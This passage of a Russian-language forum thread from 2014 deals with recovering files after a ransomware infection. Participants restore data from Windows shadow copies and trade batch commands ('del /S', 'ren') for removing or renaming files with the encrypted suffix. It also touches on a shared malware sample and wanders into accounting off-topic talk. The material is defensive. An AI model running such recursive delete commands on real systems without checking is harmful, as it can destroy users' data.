Выход конечно хороший, только вот далеко не всегда это возможно.
191 Jump
 
14.08.14
09:06
(188)У меня есть программка которая рассылает сообщение по всем или по выборочным контактам - аутлук называется.
И что теперь это вирус?
192 zak555
 
14.08.14
09:31
(191) ага
193 Smile 8D
 
14.08.14
09:53
(191) Ключевое слово было "себя", т.е. вирус таким образом размножается. Аутулук, насколько я знаю, себя не рассылает (тем более в автоматическом режиме)
194 mishaPH
 
модератор
14.08.14
09:55
(189) + 100 нам также помогли.
195 zak555
 
14.08.14
11:34
кажись есть решение, сейчас проверю
196 zak555
 
14.08.14
11:48
+ есть идея, как вернуть деньги, если заплатишь
197 Эмбеддер
 
14.08.14
11:49
(191) требуется также здравый смысл при классификации чего-либо
198 ildary
 
14.08.14
11:54
(81) уважаемые специалисты, как правильно сделать запрет просмотра файлов в папке с базой DBF?
199 zak555
 
14.08.14
12:24
РЕЗЮМЕ :

чудным образом выяснилось, что у диска С оказались предыдущие версии, а вот у Д -- нет
200 zak555
 
14.08.14
12:25
а теперь вопрос

как автоматизировать процесс удаления зашифрованного файла вида
ИмяФайла.Расширение.keybtc@gmail_com
и перенос из папки восстановления нормального файла
ИмяФайла.Расширение

?
201 NikVars
 
14.08.14
12:53
(199) Ты про архивные образы диска С речь ведешь?!
202 zak555
 
14.08.14
13:02
(201) ага
точки восстановления
203 NikVars
 
14.08.14
13:14
(202) Ты погодь радоваться. А они пользовательские данные содержат?!
204 zak555
 
14.08.14
13:31
(203)

да, наживаю диск С правой кнопкой, далее предыддущие версии, нажимаю на кнопку открыть

и воля -- все данные на метсе
205 zak555
 
14.08.14
13:31
*мест
206 zak555
 
14.08.14
13:31
**на месте
207 Arhangeldk
 
14.08.14
14:45
http://habrahabr.ru/post/232545/
Попробуй мб поможет
208 zak555
 
14.08.14
16:28
кто бы по 200 подсказал
209 HeroShima
 
14.08.14
16:31
Абрахамс...
210 Ctrekoza
 
14.08.14
19:20
(187) Тебя там забанили? Ты там также писал и они тебя забанили, а теперь ты всё время пишешь что форум плохой...
Ищи сам про КЭП.
211 zak555
 
14.08.14
19:28
(210) нет, я там не бываю, но частенько ернуду там пишут
212 Ctrekoza
 
14.08.14
19:38
(211) Ты не прав.  Статьи на этом сайте хорошего качества.
Ещё сайт аудит уважаю.
213 zak555
 
14.08.14
19:41
(212) я неоднократно встречал там ошибки

клерк в этом плане лучший, ибо там каждую тему модерируют и говорят, где неправильно
214 Ctrekoza
 
14.08.14
19:50
(213) Какие темы, очнись. Я пишу про статьи. А что на форуме может ответить малознающий бух и его не успели поправить, так такие косяки могут быть у всех.
Читай что считаешь нужным, но, обязательно найдется человек, который тебе также заявит, что там пишут...:)
Ты вопрос свой решил?
215 zak555
 
14.08.14
19:54
(214)

1. хорошо, сравни с аналогичной статьёй на клерке : http://www.klerk.ru/buh/articles/345087/

2. по теме ветки ?
216 Ctrekoza
 
14.08.14
20:01
(215) 2. Да.
217 zak555
 
14.08.14
20:02
(216) с диска С восстановил данные, с диска Д -- нет

+ я так же проработал вариант, как вернуть деньги, которую платятся мошенникам
218 Ctrekoza
 
14.08.14
20:17
(215) Однако рассчитывать, что на деле все обойдется 200-рублевым штрафом, вряд ли стоит.>>>
Она не лучше статьи с  бухонлайна. Ты не прошел по ссылке на бухонлайн и теперь так пишешь.. На бухонлайне написано ещё больше и понятнее, нужно пройтись по ссылкам в статье.
А теперь вопрос? Первый квартал штрафанули на 200 р. второй на 200 р. или там уже типа злостного нарушения можно притянуть в течение периода (год)? И зачем себе создавать проблемы...(
219 Ctrekoza
 
14.08.14
20:17
(217) Молодец. А диск Д тоже пострадал?
220 zak555
 
14.08.14
20:22
(218)

1. где на бух онЛайн написано про штраф в 200 р за квартал ?
2. 800 р/год -- ни о чём
3. + не вижу никаких проблем
221 zak555
 
14.08.14
20:23
(219) разумеется, скрипт идёт по всем диска, в т.ч. и сетевым
222 Ctrekoza
 
14.08.14
20:40
(221) что решил делать?
223 Ctrekoza
 
14.08.14
20:43
(220)
1. пройди по ссылкам внутри статьи, там должно быть
2. И так из года в год? В НК есть - сдавать по ТКС, завтра могут поднять штрафы...
3. а на  за чем платить штраф, если можно сдать и спать спокойно..:)
225 zak555
 
14.08.14
21:16
(223)

1. не вижу
2. за день не поднимают
3. сколько годовое обслуживание по сдаче ткс ?
227 zak555
 
14.08.14
21:37
(266) 3. сколько стоит ООО на ОСНО ?
228 Ctrekoza
 
14.08.14
21:42
(227) Да, там разница будет небольшая, может также, надо на их сайте смотреть прайс. А ещё, если стоит БП Проф и есть ИТС, тогда можно из программы сдавать, только кэп получить нужно, кэп стоит примерно 500-1500 р., зависит от носителя.
230 zak555
 
14.08.14
22:21
(228) только ИТС стоит 26 000
+ ещё ЭП
231 zak555
 
14.08.14
22:21
(229) шифровка отрабатывается единожды
232 Ctrekoza
 
14.08.14
22:24
(230) Можно взять техно. По-моему, без разницы какой ИТС. Не вникала, надо посмотреть.
233 zak555
 
14.08.14
22:25
(232) как раз разница есть -- минимум ПРОФ
поэтому 0.8 р против 26 р -- ни о чём
234 Ctrekoza
 
14.08.14
22:25
(231) жуть что делать?, ты меня вчера напугал, что от контрагента пришло, можно и правда нечаянно открыть....
235 Ctrekoza
 
14.08.14
22:26
(233) А как обновляешь, нетиповая?
236 zak555
 
14.08.14
22:28
(234) воспользоваться советом из 22 и 84

(235) у клиентов
237 zak555
 
19.08.14
15:38
по 200 кто подскажет ?
238 _fvadim
 
19.08.14
15:42
(237) папка восстановления содержит необходимую структуру папок?
239 zak555
 
19.08.14
15:42
(238) ага
240 _fvadim
 
19.08.14
15:44
удалить можно попробовать так

del /S *.keybtc@gmail_com
241 _fvadim
 
19.08.14
15:46
и просто скопировать сверху то что есть.
242 zak555
 
19.08.14
15:46
(240) а переименовать ?
243 _fvadim
 
19.08.14
15:47
(242) кого?
в (200) вроде нет ничего про переименование
244 zak555
 
19.08.14
15:56
(243) если в папке с восстановлением есть некий файл, а в текущем состояние его нет (или файл переименован -- добавлен суффикс .keybtc@gmail_com), то при восстановлении точки этот файл не восстановится
245 _fvadim
 
19.08.14
16:08
(244) ааааа.
тады попробовать

ren *.keybtc@gmail_com *.
246 zak555
 
19.08.14
16:09
(245) только методика из 244 на виртуальной машине не отработала

=> пока остаётся убийство *.keybtc@gmail_com и копирование из копии в изначальное место
247 _fvadim
 
19.08.14
16:11
если сработает, то есть нюанс - ren не умеет рекурсию, т.е.
запускать надо в каждом каталоге или гуглить "cmd рекурсивное переименование"
248 _fvadim
 
19.08.14
16:12
(246) если откинуть .keybtc@gmail_com, восстанавливает?
249 zak555
 
19.08.14
16:14
(248) неа, не восстановил
250 zak555
 
19.08.14
16:14
хотя должен был
251 _fvadim
 
19.08.14
16:17
чёт вводные часто меняются.
предлагаю развернуть архив и руками (пользователя) скопировать нужное.
252 zak555
 
19.08.14
16:17
(241) ты представляешь, если это несколько сот тысяч документов *?
253 zak555
 
19.08.14
16:17
254 _fvadim
 
19.08.14
16:21
(252) развернуть архив и показать пользователю где теперь его документы.
ну или определиться при каких условиях происходит автоматическое восстановление.
255 zak555
 
20.08.14
09:26
(254) мне кажется, что нужно написать некий скрипт, который будет

0. указать в некую переменную путь к копиям : У = "\\localhost\C$\@GMT-2014.08.19-04.52.01"
1. искать по диску файлы с расширением *.keybtc@gmail_com
2. определять их путь Х
3. далее скопировать из у+х в х найденный соответствующий файл и удалить с расширением
256 _fvadim
 
20.08.14
09:48
я писать не буду :)

обработку напиши, найтифайлы умеет искать в подкаталогах.
257 zak555
 
20.08.14
09:50
(256) на 1с ?
её  ещё и ставить надо
258 _fvadim
 
20.08.14
09:52
(257) контекст форума как бы подразумевает :)
тады батниками
259 mortal
 
20.08.14
09:58
Вчера манагер получил письмо от известного (с кем работал раньше) контрагента. Почта, правда, была другая, но он внимания не обратил, что нормально. И в письме, как вы уже догадались, был шифровщик, зашифровавший ему весь комп.
Благо, на сервера не полез...
260 zak555
 
20.08.14
10:39
(259)

1. нет предыдущих версий ?
2. диски сервера не подключены, как сетевые ?
261 PuhUfa
 
20.08.14
11:02
как сделал я
1. посмотрел где лежат похеренные файлы
2. отрезал им чужое расширение
3. пкм _на_папке_ -> предыдущая версия

Откат к предыдущим версиям целыми папками заметно сокращет трудозатраты.
262 mortal
 
20.08.14
11:27
(+259)админ позвонил этому контру: подтвердили взлом своей почты и то, что такие "письма счастья" получили почти все их контрагенты :)
(260)
1 - нет
2 - нет
263 zak555
 
22.08.14
08:36
(261) откат не поможет
264 zak555
 
22.08.14
08:36
(261)

1. не повезло
2. не повезло
265 DrZombi
 
гуру
22.08.14
08:41
(262) Ладно, что только письма счастье.
А вот когда тебя заносят в список спамеров и ты компания не может более отправлять почту, вот это проблема посерьезней :)
266 DrZombi
 
гуру
22.08.14
08:43
(259) Что у вас там так все плохо?
А где настройка фильтра по содержимому, что бы кромя док и екселя, может еще и архив, ничего не принимал :)
267 Torquader
 
23.08.14
21:20
(265) Для этого нужно иметь несколько ящиков с разными именами, чтобы даже полный отказ одного из них не приводит к последствиям.
(266) Я тут одним "товарищам" фильтр по содержимому настроил, так они это - попросили систему переставить, так как под предложенной им ничего не работает - и не докажешь, что сделано в целях их безопасности.
268 Ислам
 
27.08.14
06:10
(187) Это не г@вняный форум. Настоящий г@вняный форум вот: http://govnoforum.ru Хахаха!!!
271 Besogonskiy
 
03.09.14
15:52
(0)подари мне этот файл.
272 zak555
 
03.09.14
15:53
(271) см. в 54
273 _fvadim
 
03.09.14
15:56
(271) лентяй :)
там файлик тянет несколько экзешников из интернету. так что толку от скрипта загрузки - 0.
Я не хочу быть самым богатым человеком на кладбище. Засыпать с чувством, что за день я сделал какую-нибудь потрясающую вещь — вот что меня интересует. Стив Джобс